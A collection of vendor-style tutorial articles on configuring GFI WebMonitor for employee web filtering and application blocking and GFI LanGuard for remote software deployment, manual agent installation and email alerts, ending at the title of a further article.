The Security dashboard allows tracking of web security incidents and security policy violationsFigure 5. The Security dashboard allows tracking of web security incidents and security policy violations (click to enlarge)

Running Web Reports

The easiest way to manage and produce the information gathered is to run reports. The various categories provided allow the user to run and view information of Internet usage depending on management requirements. The following image shows the different options available on the left panel:

WebMonitor internet web usage reports are highly customisable and provide detailed informationFigure 6. WebMonitor internet web usage reports are highly customisable and provide detailed information (click to enlarge)

But often management would rather take a pulse of the current situation. GFI WebMonitor caters to that requirement very well. The best place to look for instant information regarding certain key aspects of resource usage is the Web Insights section.

If management wanted to review the bandwidth information, the following dashboard would give that information readily:

The Web Insight section keeps an overall track of internet usageFigure 7. The Web Insight section keeps an overall track of internet usage (click to enlarge)

This provides a percentage view of how much data contributes to download or upload.

Security Insights shows all current activities and concerns that needs attention:

WebMonitor Security Insights dashboard displaying important web security reportsFigure 8. WebMonitor Security Insights dashboard displaying important web security reports (click to enlarge)

Conclusion

There is no doubt GFI WebMonitor becomes a very effective tool that allows businesses to monitor and control internet access for employees, guests and other internet users. Its intuitive interface allows administrators and IT Managers to quickly obtain the information they require but also put the necessary security policies in place to minimise security threats and internet resource abuse.

  • Hits: 12245

Increase your Enterprise or SMB Organization Security via Internet Application & User Control. Limit Threats and Internet Abuse at the Workplace

gfi-webmonitor-internet-application-user-control-1aIn this era of constantly pushing for more productivity and greater efficiency, it is essential that every resource devoted to web access within a business is utilised for business benefit. Unless the company concerned is in the business of gaming or social media, etc. it is unwise to use resources like internet/web access, and the infrastructure supporting it, for a purpose other than business. Like they say, “Nothing personal, just business”

With this in mind, IT administrators have their hands full ensuring management of web applications and their communication with the Internet. The cost of not ensuring this is loss of productivity, misuse of bandwidth and potential security breaches. As a business it is prudent to block any unproductive web application e.g. gaming, social media etc. and restrict or strictly monitor file sharing to mitigate information leakages.

It is widely accepted that in this area firewalls are of little use. Port blocking is not the preferred solution as it has a similar effect to a sledge hammer. What is required is the fineness of a scalpel to parse out the business usage from the personal and manage those business requirements accordingly. To be able to manage web application at such a level, it is essential to be able to identify and associate the request with its respective web application. Anything in line with business applications goes through, the rest are blocked.

This is where WebMonitor excels in terms of delivering this level of precision and efficiency. It identifies access requests from supported applications using inspection technology and helps IT administrators to allow or block them. Hence, the administrators can allow certain applications for certain departments while blocking certain other applications as part of a blanket ban, thus enhancing the browsing experience of all users.

So, to achieve this, the process is to use the unified policy system of WebMonitor. The policies can be configured specifically for application control or, within the same policy, several application controls can be combined using other filtering technologies.

Let’s take a look at the policy panel of WebMonitor:

gfi-webmonitor-internet-application-user-control-1Figure 1. WebMonitor Policy Panel interface. Add, delete, create internet access policies with ease (click to enlarge)

In order to discover the controls that are available against a certain application, the application needs to be dragged into the panel. For example, if we were to create a policy to block Google Drive we would be dragging that into the panel itself.

Once the related controls show up, we can select an application or application category the policy will apply to.

The rest of the configuration from this point will allow creating definitions for the following:

  • Filter options
  • Scope of the policy
  • Actions to be taken
  • Handling of exceptions
  • Managing notifications

All of the above are ready to be implemented in a ‘drag – and – drop’ method. GFI WebMonitor will commence controlling access of the configured application to the Internet the moment the policy is saved.

So, going back to the example of creating the ‘block Google Drive’ policy, the steps are quite simple:

1. Click on ‘Add Policy’ as show in the following image:

gfi-webmonitor-internet-application-user-control-2

Figure 2. Click on the “Add Policy” button to being creating a policy to block internet access

Enter a Name and description in the relevant fields:

gfi-webmonitor-internet-application-user-control-3Figure 3. Adding policy name and description in WebMonitor to block an application network-wide (click to enlarge)

3. As this policy applies to ‘all’, at this moment there is no need to configure the scope. This can be done on a per user, group or IP address only basis.

4. Drag in the Application Block from the left panel (as shown in the following image), Select ‘Block’ in the ‘Allow, Block, Warn, Monitor’ section.

5. In the Application Category section, select ‘File Transfer’ as shown in the image below:

gfi-webmonitor-internet-application-user-control-4Figure 4. WebMonitor: Blocking the File Transfer application category from the internet (click to enlarge)

6. Click on the ‘Applications’ Tab and start typing ‘Google Drive’ in the field. The drop down list will include Google Drive. Select it and then press enter. The application will be added. Now Click on Save.

We need to keep in mind that the policy is operational the moment the Save button, located at the top right corner, is clicked.

Now if any user tries to access the web application Google Drive, he/she will be presented with the ‘Block Page’ rendered by GFI WebMonitor. At the same time, any Google Drive thick client installed on the user’s machine will not be able to connect to the Internet

As mentioned earlier, and reiterated through the above steps, the process of creating and implementing a web access management policy in WebMonitor is quite simple. Given the length and breadth of configuration options within the applications and the scope, this proves to be a very powerful tool that will make the task of managing and ensuring proper usage of web access, simple and effective for IT Administrators in small and large enterprise networks.

  • Hits: 11368

GFI WebMonitor Installation: Gateway / Proxy Mode, Upgrades, Supported O/S & Architectures (32/64bit)

WebMonitor is an awarded gateway monitoring and internet access control solution designed to help organizations deal with user internet traffic, monitor and control bandwidth consumption, protect computers from internet malware/viruses and other internet-based threats plus much more. GFI WebMonitor supports two different installation modes: Gateway mode and Simple Proxy mode. We’ll be looking into each mode and help administrators and engineers understand which is best, along with the prerequisites and caveats of each mode.

Proxy vs Gateway Mode

Proxy mode, also named Simple Proxy mode is the simplest way to install GFI WebMonitor. You can deploy this on any computer that has access to the internet. In Simple Proxy mode, all client web-browser traffic (HTTP/HTTPS) is directed through GFI WebMonitor. To enable this type of setup, you will need an internet facing router that can forward traffic and block ports.

With GFI WebMonitor functioning in Simple Proxy mode, each client machine must also be configured to use the server as a web proxy for HTTP and HTTPS protocols. GFI WebMonitor comes with built-in Web Proxy Auto-Discovery (WPAD) server functionality that makes the process easy - simply enable automatic discovery of proxy server for each of your client machines and they should automatically find and use WebMonitor as a proxy. In case of a domain environment, it is best to regulate this setting using a Group Policy Object (GPO).

When WebMonitor is configured to function in Internet Gateway mode, all inbound and outbound client traffic will pass through GFI WebMonitor, irrespective of whether the traffic is HTTP or non-HTTP. With Internet Gateway mode, the client browser does not need to point to any specific proxy – all that’s required is to enable the Transparent Proxy function in GFI WebMonitor.

Supported OS & Architectures

Whether functioning as a gateway or a web proxy, GFI WebMonitor processes all web traffic. For a smooth operation that amounts to using a server architecture capable of handling all the requests every day. When the environment is small (10-20 nodes), for instance, a 2 GHz processor and 4 GB RAM minimum with a 32-bit Windows operating system architecture will suffice.

Larger environments, such as those running the Windows Server operating system on a minimum of 8 GB RAM and multi-core CPU will require the 64-bit architecture. GFI WebMonitor works with both 32- as well as 64-bit Windows operating system architectures starting from Windows 2003 and Windows Vista.

Installation & Upgrading

When installing for the first time, GFI WebMonitor starts by detecting its prerequisites. If the business is already using GFI WebMonitor, the process determines the prerequisites according to the older product instance. If the installation kit encounters an older instance, it imports the previous settings and redeploys them after completing the installation.

Whether installing for the first time or upgrading an older installation, the installation kit looks for any setup prerequisites necessary and installs them automatically. However, some prerequisites may require user interaction and these will come up as separate installation processes with their own user interfaces.

Installing GFI WebMonitor

As with all GFI products, installation is a very easy follow-the-bouncing-ball process. Once the download of GFI WebMonitor is complete, execute the installer using an account with administrative privileges.

If WebMonitor has been recently downloaded, you can safely skip the newer build check. When ready, click Next to proceed:

gfi-webmonitor-installation-setup-gateway-proxy-mode-1

Figure 1. Optional check for a new WebMonitor edition during installation

You will need to fill in the username and/or the IP address that will have administrative access to the web-interface of GFI WebMonitor, then click Next to select the folder to install GFI WebMonitor and finally start the installation process:

gfi-webmonitor-installation-setup-gateway-proxy-mode-2

Figure 2. Selecting Host and Username that are allowed to access the WebMonitor Administration interface.

Once the installation process is complete, click Finish to finalize the setup and leave the Open Management Console checked:

gfi-webmonitor-installation-setup-gateway-proxy-mode-3

Figure 3. Installation complete – Open Management Console

After this, the welcome screen of the GFI WebMonitor Configuration Wizard appears. This will allow you to configure the server to operate in Simple Proxy Mode or Gateway Mode. At this point, it is recommended you enable JavaScript in Internet Explorer or the web browser of your choice before proceeding further:

gfi-webmonitor-installation-setup-gateway-proxy-mode-4aFigure 4. The welcome screen once WebMonitor installation has completed

After clicking on Get Started to proceed, we need to select which of the two modes GFI WebMonitor will be using. We selected Gateway mode to ensure we get the most out of the product as all internet traffic will flow through our server and provide us with greater granularity & control:

gfi-webmonitor-installation-setup-gateway-proxy-mode-5aFigure 5. Selecting between Simple Proxy and Gateway mode

The Transparent Proxy can be enabled at this stage, allowing web browser clients to automatically configure themselves using the WPAD protocol. WebMonitor shows a simple network diagram to help understand how network traffic will flow to and from the internet:

gfi-webmonitor-installation-setup-gateway-proxy-mode-6aFigure 6. Internet traffic flow in WebMonitor’s Gateway Mode

Administrators can select the port at which the Transparent Proxy will function and then click Save and Test Transparent Proxy. GFI WebMonitor will confirm Transparent Proxy is working properly.

Now, click Next to see your trial license key or enter a new license key. Click on Next to enable HTTPS scanning.

HTTPS Scanning gives you visibility into secure surfing sessions that can threaten the network's security. Malicious content may be included in sites visited or files downloaded over HTTPS. The HTTPS filtering mechanism within GFI WebMonitor enables you to scan this traffic. There are two ways to configure HTTPS Proxy Scanning Settings, via the integrated HTTPS Scanning Wizard or manually.

Thanks to GFI WebMonitor’s flexibility, administrators can add any HTTPS site to the HTTPS scanning exclusion list so that it bypasses inspection.

If HTTPS Scanning is disabled, GFI WebMonitor enables users to browse HTTPS websites without decrypting and inspecting their contents.

When ready, click Next again and provide the full path of the database. Click Next again to enter and validate the Admin username and password. Then, click Next to restart the services. You can now enter your email details and click Finish to end the installation.

gfi-webmonitor-installation-setup-gateway-proxy-mode-7aFigure 7. GFI WebMonitor’s main control panel

Once the installation and initial configuration of GFI WebMonitor is complete, the system will begin gathering useful information on our users’ internet usage.

In this article we examined WebMonitor Simple Proxy and Gateway installation mode and saw the benefits of each method. We proceeded with the Gateway mode to provide us with greater flexibility, granularity and reporting of our users’ internet usage. The next articles will continue covering in-depth functionality and reporting of GFI’s WebMonitor.

  • Hits: 14999

GFI WebMonitor: Monitor & Secure User Internet Activity, Stop Illegal File Sharing - Downloads (Torrents), Web Content Filtering For Organizations

gfi-webmonitor-internet-filtering-block-torrents-applications-websites-reporting-1In our previous article we analysed the risks and implications involved for businesses when there are no security or restriction policies and systems in place to stop users distributing illegal content (torrents). We also spoke about unauthorized access to company systems, sharing sensitive company information and more. This article talks about how specialized systems such as WebMonitor are capable of helping businesses stop torrent applications accessing the internet, control the websites users access, block remote control software (Teamviewer, Remote Desktop, Ammy Admin etc) and put a stop to users wasting bandwidth, time and company money while at work.

WebMonitor is more than just an application. It can help IT departments design and enforce internet security policies by blocking or allowing specific applications and services accessing the internet.

WebMonitor is also capable of providing detailed reports of users’ web activity – a useful feature that ensure users are not accessing online resources they shouldn’t, and provide the business with the ability to check users’ activities in case of an attack, malware or security incident.

WebMonitor is not a new product - it carries over a decade of development and has served millions of users since its introduction into the IT market. With awards from popular IT security magazines, Security Experts, IT websites and more, it’s the preferred solution when it comes to a complete web filtering and security monitoring solution.

Blocking Unwanted Applications: Application Control – Not Port Control

Blocking Unwanted Applications: Application ControlSenior IT Managers, engineers and administrators surely remember the days where controlling TCP/UDP ports at the Firewall level was enough to block or provide applications access to the internet. For some years now, this is no longer a valid way of application control, as most ‘unwanted’ applications can smartly use common ports such as HTTP (80) or HTTPS (443) to circumvent security policies, passing inspection and freely accessing the internet.

In order to effectively block unwanted applications, businesses must realize that it is necessary to have a security Gateway device that can correctly identify the applications requesting access to the internet, regardless the port they are trying to use – aka Application Control.

Application Control is a sophisticated technique that requires upper layer (OSI Model) inspection of data packets as they flow through the gateway or proxy, e.g. GFI WebMonitor. The gateway/proxy executes deep packet level inspection to identify the application requesting access to the internet.

In order to correctly identify the application the gateway must be aware of it, which means it has to be listed in its local database.

The Practical Benefits Of Internet Application Control & Web Monitoring Solution

Let’s take a more practical look at the benefits an organization has when implementing an Application Control & Web Monitoring solution:

  • Block file sharing applications such as Torrents
  • Stop users distributing illegal content (games, applications, movies, music, etc)
  • Block remote access applications such as TeamViewer, Remote Desktop, VNC, Ammy Admin and more.
  • Stop unauthorized access to the organization’s systems via remote access applications
  • Block access to online storage services such as DropBox, Google Drive, Hubic and others
  • Avoid users sharing sensitive information such as company documents via online storage services
  • Save valuable bandwidth for the organization, its users, remote branches and VPN users
  • Protect the network from malware, viruses and other harmful software downloadable via the internet
  • Properly enforce different security policies to different users and groups
  • Protect against possible security breaches and minimize responsibility in case of an infringement incident
  • And much more

The above list contains a few of the major benefits that solutions such as WebMonitor can offer to organizations.

Why Web Monitoring & Content Filtering is Considered Mandatory

Web Monitoring is a very sensitive topic for many organizations and its users, mainly because users do not want others to know what they are doing on their computer. The majority of users perceive web monitoring as spying on them to see what sites they are accessing and if they are wasting time on websites and internet resources unrelated to work, however, users do not understand the problems and security risks that are mostly likely to arise if no monitoring or content filtering mechanism is in place.

In fact the damage caused by users irresponsibly visiting high-risk sites and surfing the internet without any limits is way bigger than most companies might think and there are some really great examples that help prove this point. The USA FBI site has a page with examples of internet scams and risks from social media network sites.

If we assume your organization is one of the luckiest ones that hasn’t been hit (yet) from irresponsible user internet activities, then we are here to assure you that it’s simply a matter of time.

Stop wasting company bandwidth from user downloadsApart from the imminent security risk, users who have uncontrollable access are also wasting bandwidth – that’s bandwidth the organization is paying for - and are likely to slow down the internet for the rest who are legitimately trying to get work done. In cases where VPNs are running over the same lines then VPN users, remote branches and mobile users are most likely to experience slow connection speeds when accessing the organization’s resources over the internet.

This problem becomes even more evident when asymmetrical WAN lines are in use, such as ADSL lines. With asymmetrical WAN lines, a single user who is uncontrollably uploading photos, movies (via torrent) or other content can affect all other users downloading since bottlenecks can easily occur when one of the two streams (downstream or upstream) is in heavy usage. This is a main characteristic of asymmetrical WAN lines.

Finally, if there is an organization security policy in place it’s most likely to contain fair internet usage guidelines for users and specify what they can and cannot do using the organization’s internet resources. The only way to enforce such a policy is through a sophisticated web monitoring & policy enforcement mechanism such as GFI WebMonitor.

Summary

In this article we analysed how specialized web monitoring and control application software, such as WebMonitor, are able to control which user applications are able to access the internet, control websites users within an organization can access, block internet content while saving valuable bandwidth. With such solutions, organizations are able to enforce their internet security policies while at the same time protecting themselves from unauthorized access to their systems (remote desktop software), stop illegal activities such as torrent file sharing and more.

  • Hits: 14297

Dealing with User Copyright Infringement (Torrents), Data Loss Prevention (DLP), Unauthorized Remote Control Applications (Teamviewer, RDP) & Ransomware in the Business Environment

GFI WebMonitor - Control user copyright infringement in the Business EnvironmentOne of the largest problems faced by organizations of any size is effectively controlling user internet access (from laptops, mobile devices, workstations etc), minimizing the security threats for the organization (ransomware – data loss prevention), user copyright infringement (torrent downloading/sharing movies, games, music etc) and discover where valuable WAN-Internet bandwidth is being wasted.

Organizations clearly understand that using a Firewall is no longer adequate to control the websites its users are able to access, remote control applications (Teamviewer, Radmin, Ammyy Admin, Remote desktop etc), file sharing applications - Bittorrent clients (uTorrent, BitComet, Deluge, qBittorrent etc), online cloud storage services (Dropbox, OneDrive, Google Drive, Box, Amazon Cloud Drive, Hubic etc) and other services and applications.

The truth is that web monitoring applications such as GFI’s WebMonitor are a lot more than just a web proxy or internet monitoring solution.

Web monitoring applications are essential for any type or size of network as they offer many advantages:

  • They stop users from abusing internet resources
  • They block file-sharing applications and illegal content sharing
  • They stop users using cloud-based file services to upload sensitive documents, for example saving company files to their personal DropBox, Google Drive etc.
  • They stop remote control applications connecting to the internet (e.g Teamviewer, Remote Desktop, Ammy Admin etc)
  • They ensure user productivity is kept high by allowing access to approved internet resources and sites
  • They eliminate referral ad sites and block abusive content
  • They support reputation blocking to automatically filter websites based on their reputation
  • They help IT departments enforce security policies to users and groups
  • They provide unbelievable flexibility allowing any type or size of organization to customise its internet usage policy to its requirements

The Risk In The Business Environment – Illegal Downloading

GFI WebMonitor The Risk in the Business Environment – Illegal DownloadingMost Businesses are completely unaware of how serious these matters are and the risks they are taking while dealing with other ‘more important’ matters.

Companies such as the Motion Picture Association of America (MPAA) and the Recording Industry Association of America (RIAA) are in a continuous battle suing and fighting with companies, ISPs and even home users for illegally distributing movies and music.

Many users are aware of this and are now turning to their company’s internet resources, which in many cases offer faster and unlimited data transfer, to download their illegal content such as movies, games, music and other material.

An employer or business can be easily held responsible for the actions of its employees when it comes to illegal download activities, especially if no policies or systems are in place.

In the case of an investigation, if the necessary security policies and web monitoring systems are in place with the purpose of preventing copyright infringement and illegal downloading, businesses are less vulnerable to the illegal implications of their users, plus it allows them to track down and find the person responsible.

Data Loss Prevention (DLP) – Stop Users From Uploading Sensitive/Critical Documents

GFI WebMonitor Stop Users from Uploading Sensitive - Critical Company DocumentsWhile illegal downloading is one major threat for businesses, stopping users sharing company data and sensitive information (aka Data Loss Prevention or DLP) is another big problem.

With the explosion of (free) cloud-based storage services such as DropBox, OneDrive, Google Drive and others, users can quickly and easily upload any type of document directly from their workplace to their personal cloud storage and instantaneously share it with anyone in the world, without the company’s consent or knowledge.

The smartly designed cloud-storage applications are able to use HTTP & HTTPS to transfer files, and circumvent firewall security policies and other types of protection.

More specialised application proxies such as GFI’s WebMonitor can effectively detect and block these applications, saving businesses major security breaches and damages.

Block Unauthorized Remote Control Applications (TeamViewer, Ammy Admin, Remote Desktop, VNC etc) & Ransomware

Remote control applications such as Teamviewer, Ammy Admin, Remote Desktop and others have been causing major security issues in organizations around the world. In most cases, users run these clients so they can then remotely access and control their workstation from home, continuing their “downloads” or transfer files to their home PC and other unauthorized activities.

In other cases, these remote applications become targets for pirates and hackers, who try to hijack sessions that have been left running by users.

Ransomware is a new type of threat where, through an application running on the user’s workstations, hackers are able to gain access and encrypt files found on the computers, even network drives and shares within a company.

GFI WebMonitor - Avoid Ransomware - Hackers via Remote Desktop/Control ApplicationsIn late 2015, popular Ammy Admin – a remote control software, was injected with malicious code and unaware home and corporate users downloaded and used the free software. Infected by at least five different malware versions, they gave attackers full access and control over the PC. Some of the malware facilitated stealing banking details, encrypting user files in exchange for money to decrypt them and many more.

In another case during 2015, attackers began installing ransomware on computers running Remote Desktop Services. The attackers obtained access via brute-force attack and then installed their malware which started scanning for specific file extensions. A ransom of $1000 USD was requested in order to have the files decrypted.

Blocking this type of applications is a major issue for companies as users uncontrollably make use of them, not realizing they are putting their company at serious risk.

Use of such applications should be heavily monitored and restricted because they pose a significant threat to businesses.

GFI’s WebMonitor’s extensive application list has the ability to detect and effectively block these and many other similar applications, putting an end to this major security threat.

Summary

The internet today is certainly not a safe place for users or organizations. Security threats resulting from users downloading and distributing illegal content, sharing company sensitive information, uncontrollably accessing their systems from home or other locations and the potential hazard of attackers gaining access to internal systems via RDP programs, is real. Avoid getting your company caught with its pants down and seek ways to tighten and enforce security policies that will help protect them from these ever present threats.

  • Hits: 10240

Automate Software Deployment with the Help of GFI LanGuard. Quick & Easy Software Installation on all PCs – Workstations & Servers

Deploying a single application to hundreds of workstations or servers can become a very difficult and time-consuming task. Thankfully, remote deployment of software and applications is a feature offered by GFI LanGuard. With Remote Software Deployment, we can automate the installation of pretty much any software to any amount of computers on the network, including Windows servers (2003,2008, 2012), Domain Controllers, Windows workstations and other.

In this article we’ll show how easy it is to deploy any custom software using GFI LanGuard. For our demonstration purposes, we’ll deploy Mozilla Firefox to a Windows server.

To begin configuring the deployment, select the Remediate tab from GFI LanGuard, then select the Deploy Custom Software option as shown below:

Preparing the network-wide deployment of Mozilla Firefox through GFI LanGuard

Figure 1. Preparing the network-wide deployment of Mozilla Firefox through GFI LanGuard

Next, select the target machine from the left panel. We can select one or multiple targets using the CTRL key. For our demonstration, we selected the DCSERVER which is a Windows 2003 server.

Now, from the Deploy Custom Software section, click on Add to select the software to be deployed. This will present the Add Custom Software window where we can select the path to the installation file. GFI LanGuard also provides the ability to run the setup file using custom parameters – this handy feature allows the execution of silent installations (no window/prompt shown at the target machine desktop), if supported by the application to be installed. Mozilla Firefox supports silent installation using the ‘ –ms ‘ parameter:

GFI LanGuard custom software deployment using a parameter for silent installation Figure 2. GFI LanGuard custom software deployment using a parameter for silent installation

When done, click on the Add button to return back to the main screen where GFI LanGuard will display the target computer(s) & software selected, plus installation parameters:

GFI LanGuard ready to deploy Mozilla Firefox on a Windows Server

Figure 3. GFI LanGuard ready to deploy Mozilla Firefox on a Windows Server

Clicking on the Deploy button brings up the final window where we can either initiate the deployment immediately or schedule it for a later time. From here, we can also insert any necessary credentials but also select to notify the remote user, force a reboot after the installation and many other useful options:

Final configuration options for remote deployment of Mozilla Firefox via GFI LanGuard

Figure 4. Final configuration options for remote deployment of Mozilla Firefox via GFI LanGuard

GFI LanGuard’s remote software deployment is so sophisticated that it even allows the configuration of the number of threads that will be executed on the remote computer (under the Advanced options link), helping ensure minimum impact for the user working on the remote system.

Once complete, click on OK to proceed with the remote deployment. LanGuard will then return back to the Remediation window and provide real-time update of the installation process, along with a detailed log below:

GFI LanGuard Remote software deployment of Mozilla Firefox complete

Figure 5. GFI LanGuard Remote software deployment of Mozilla Firefox complete

Installation of Mozilla Firefox was incredibly fast and to our surprise, the impact on the remote host was undetectable. We actually didn’t realise the installation was taking place until the Firefox icon appeared on the desktop. CPU history also confirm there was no additional load on the server:

Successful installation of Mozilla Firefox, without any system performance impact!

Figure 6. Successful installation of Mozilla Firefox, without any system performance impact!

GFI LanGuard’s software deployment feature is truly impressive. It not only provides network administrators with the ability to deploy software on any machine on their network, but also gives complete control on the way the software will be deployed and resources that will be used on the remote computer during the installation. Additional options such as scheduling the deployment, custom user messages before or after the installation, remote reboot and many more, make GFI LanGuard it a necessary tool for any organization.

  • Hits: 11763

How to Manually Deploy – Install GFI LanGuard Agent When Access is Denied By Remote Host (Server – Workstation)

When IT Administrators and Managers are faced with the continuous failure of GFI LanGuard Agent deployment e.g (Access is denied), it is best to switch to manual installation in order to save valuable time and resources. The reason of failure can be due to incorrect credentials, disabled account, firewall settings, disabled remote access on the target computer and many more. Deploying GFI LanGuard Agents is the best way to scan your network for unpatched machines or machines with critical vulnerabilities.

GFI LanGuard Agent deployment failing with Access is denied

Figure 1. GFI LanGuard Agent deployment failing with Access is denied

Users interested can also check our article Benefits of Deploying GFI LanGuard Agents on Workstations & Servers. Automate Network-wide Agent Scanning and Deployment.

Step 1 – Locate Agent Package On GFI LanGuard Server

The GFI LanGuard Agent installation file is located in one of the following directories, depending on your operating system:

  • For 32bit operating systems: c:\Program Files\GFI\LanGuard 11\Agent\
  • For 64bit operating systems: c:\Program Files (x86)\GFI\LanGuard 11\Agent\

The location of GFI LanGuard Agent on our 64bit O/S.

Figure 2. The location of GFI LanGuard Agent on our 64bit O/S.

Step 2 – Copy The File To The Target Machine & Install

Once the file is copied to the target machine, execute it using the following single line command prompt:

c:\LanGuard11agent.msi /qn GFIINSTALLID="InstallationID" /norestart /L*v "%temp%\LANSS_v11_AgentKitLog.csv

Note: InstallationID is an ID that can be found in the crmiini.xml file located on the GFI LanGuard server directory for 32bit O/S: c:\Program Files\GFI\LanGuard 11 Agent  or c:\Program Files (x86)\GFI\LanGuard 11 Agent for 64bit O/S.

Following is a screenshot of the contents of our crmiini.xml file where the installation ID is clearly shown:

Installation ID in crmiini.xml file on our GFI LanGuard Server

Figure 3. Installation ID in crmiini.xml file on our GFI LanGuard Server

With this information, the final command line (DOS) for the installation of the Agent will be as follows:

LanGuard11agent.msi /qn GFIINSTALLID=" e86cb1c1-e555-40ed-a6d8-01564bdb969e" /norestart /L*v "%temp%\LANSS_v11_AgentKitLog.csv

Note: Make sure the command prompt is run with Administrator Privileges (Run as Administrator), to ensure you do not have any problems with the installation.

Here is a screenshot of the whole command executed:

Successfully Installing GFI LanGuard Agent On Workstations & Servers

Figure 4. Successfully Installing GFI LanGuard Agent On Workstations & Servers

Notice that the installation is a ‘silent install’ and will not present any message or prompt the user for a reboot. This makes it ideal for quick deployments where no reboot and minimum user interruption is required.

A restart will be necessary to complete the Agent initialization.

Important Notes

After completing the manual installation of the GFI LanGuard Agent, it is necessary to remote deploy the Agent from the GFI LanGuard console as well, otherwise the GFI LanGuard server will not be aware of the Agent manually installed on the remote host.

Also, it is necessary to deploy at least one Agent remotely via GFI LanGuard server console, before attempting the manual deployment, in order to initially populate the Crmiini.xml file with the installation id parameters.

This article covered the manual deployment of GFI’s LanGuard Agent on Windows-based machines. We took a look at common reasons why remote deployment of the Agent might fail, and covered step-by-step the manual installation process and prerequisites to ensure the Agent is able to connect to the GFI LanGuard server.

  • Hits: 20701

Benefits of Deploying GFI LanGuard Agents on Workstations & Servers. Automate Network-wide Agent Scanning & Deployment

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-1aGFI LanGuard Agents are designed to be deployed on local (network) or remote servers and workstations. Once installed, the GFI LanGuard Agents can then be configured via LanGuard’s main server console, giving the administrator full control as to when the Agents will scan the host they are installed on, and communicate their status to the GFI LanGuard server.

Those concerned about system resources will be pleased to know that the GFI LanGuard Agent does not consume any CPU cycles or resources while idle. During the time of scanning, once a day for a few minutes, the scan process is kept at a low priority to ensure that it does not interfere or impact the host’s performance.

GFI LanGuard Agents communicate with the GFI LanGuard server using TCP port 1070, however this can be configured.

Let’s see how we can install the GFI LanGuard Agent from the server’s console.

First open GFI LanGuard and select Agents Management from the Configuration tab:

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-1

Figure 1. Select Agents Management and the Deploy Agents

Next, you can choose between Local domain or Custom to define your target(s):

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-2

Figure 2. Defining Target rules for GFI LanGuard Agent deployment

Since we’ve selected Custom, we need to click on Add new rule to add our targets.

The targets can be defined via their Computer name (shown below), Domain name or Organization Unit:

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-3

Figure 3. Defining our target hosts using their Computer name

When complete, click on OK to return to the previous window.

We now see all computer hosts selected:

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-4

Figure 4. Viewing selected hosts for Agent deployment

The Advance Settings option on the lower left area of the window, allows us to configure the automatic discovery of machines with Agents installed, setup up the Audit schedule of the agent (when it will scan its host and update the LanGuard server), Scan profile used by the Agent, plus an extremely handy feature called Auto Remediation which enables GFI LanGuard to automatically download and install missing updates, service packs, uninstall unauthorized applications and more, on the remote computers.

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-5

Figure 5. GFI LanGuard - Agent Advanced Settings – Audit Schedule tab

The screenshot below shows us the Auto Remediation tab settings:

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-6

Figure 6. Agent Advanced Settings – Auto Remediation tab

When done, click on OK to save the selected settings and return back to the previous window.

Now click on Next to move to the next step. At this point, we need to enter the administrator credentials of the remote machine(s) so that GFI LanGuard can log into the remote machines and deploy the agent. Enter the username and password and hit Next and then Finish at the last window:

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-7

Figure 7. Entering the necessary credentials for the Agent deployment

GFI LanGuard will now being the deployment of its Agent to the selected remote hosts:

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-8

Figure 8. GFI LanGuard preparing for the Agent deployment

After a while, the LanGuard Agent will report its installation status. Where successfully, we will see the Installed message, otherwise a Pending install message will continue to be displayed along with an error if it was unsuccessful:

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-9

Figure 9. LanGuard Agent installation status

Common problems not allowing the successful Agent deployment are incorrect credentials, Firewall or user rights.

To check the status of the installed Agent, we can simply select the desired host, right-click and select Agent Diagnostic as shown below:

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-10

Figure 10. Accessing GFI LanGuard Agent Diagnostics

The Agent Diagnostic window is an extremely helpful feature as it provides a great amount of information on the Agent and the remote host. In addition, at the end of the Diagnosis Activity Window, we’ll find a zip file that contains all the presented information. This file can use email to GFI’s support in case of Agent problems:

gfi-languard-how-to-deploy-agent-network-wide-on-servers-workstations-11

Figure 11. Running the Agent Diagnostics report

The GFI LanGuard Agent is an extremely useful feature that allows the automatic monitoring, patching and updating of the host machine, leaving IT Administrators and Managers to deal with other important tasks. Thanks to its Domain & Workgroup support, GFI LanGuard it can handle any type and size of environment. If you haven’t used it yet, download your copy of GFI LanGuard and give it a try – you’ll be surprised how much valuable information you’ll get on your systems security & patching status and the time you’ll save!

  • Hits: 14353

How to Configure Email Alerts in GFI LanGuard 2015 – Automating Alerts in GFI LanGuard

One of the most important features in any network security monitoring and patch management application such as GFI’s LanGuard is the ability to automate tasks e.g automatic network scanning, email alerts etc. This allows IT Administrators, Network Engineers, IT Managers and other IT Department members, continue working on other important matters while they have their peace of mind that the security application is keeping things under control and will alert them instantly upon any changes detected within the network or even vulnerability status of the hosts monitored.

GFI LanGuard’s email alerting feature can be easily accessed either from the main Dashboard where usually the Alerting Options notification warning appears at the bottom of the screen:

gfi-languard-configure-automated-email-alert-option-1

Figure 1. GFI LanGuard email alerting Option Notification

Or alternatively, by selecting Configuration from the main menu and then Alerting Options from the left side area below:

gfi-languard-configure-automated-email-alert-option-2

Figure 2. Accessing Alerting Options via the menu

Once in the Alerting Options section, simply click on the click here link to open the Alerting Options Properties window. Here, we enter the details of the email account that will be used, recipients and smtp server details:

gfi-languard-configure-automated-email-alert-option-3

Figure 3. Entering email, recipient & smtp account details

Once the information has been correctly provided, we can click on the Verify Settings button and the system will send the recipients a test notification email. In case of an IT department, a group email address can be configured to ensure all members of the department receive alerts and notifications.

Finally, at the Notification tab we can enable and configure a daily report that will be sent at a specific time of the day and also select the report format. GFI LanGuard supports multiple formats such as PDF, HTML, MHT, RTF, XLS, XLSX & PNG.

gfi-languard-configure-automated-email-alert-option-4

Figure 4. GFI LanGuard Notification Window settings

When done, simply click on the OK button to return back to the Alerting Options window.

GFI LanGuard will now send an automated email alert on a daily basis whenever there are changes identified after a scan.

This article showed how GFI LanGuard, a network security scanner, vulnerability scanner and patch management application, can be configured to automatically send email alerts and reports on network changes after every scan.

  • Hits: 10351

How to Scan Your Network and Discover Unpatched, Vulnerable, High-Risk Servers or Workstations using GFI LanGuard 2015

